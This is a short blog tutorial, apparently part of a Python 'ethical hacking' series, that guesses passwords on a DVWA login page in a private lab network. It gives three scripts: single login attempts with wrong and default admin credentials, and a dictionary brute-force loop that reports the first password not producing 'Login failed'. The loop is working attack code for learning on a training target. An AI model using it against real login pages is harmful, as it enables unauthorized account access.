Python Ethical Hacking - WEB PENETRATION TESTING(5)

Guessing Login Information on Login Pages

Our target website: http://10.0.0.45/dvwa/login.php

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "dfdfddfd", "password": "1234", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())

Execute the Python Script.

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "password", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "", "Login": "submit"}

with open("password.list", "r") as wordlist_file:
    for line in wordlist_file:
        word = line.strip()
        data_dict["password"] = word
        response = requests.post(target_url, data=data_dict)
        if "Login failed" not in response.content.decode():
            print("[+] Got the password --> " + word)
            exit()

print("[+] Reached end of line.")

posted @ 2019-10-20 10:18 晨风_Eric 阅读(117) 评论(0) 编辑收藏举报

刷新页面返回顶部

一蓑烟雨

该面对的绝不逃避，该执著的永不怨悔，该舍弃的不再留念，该珍惜的好好把握。

Python Ethical Hacking - WEB PENETRATION TESTING(5)

公告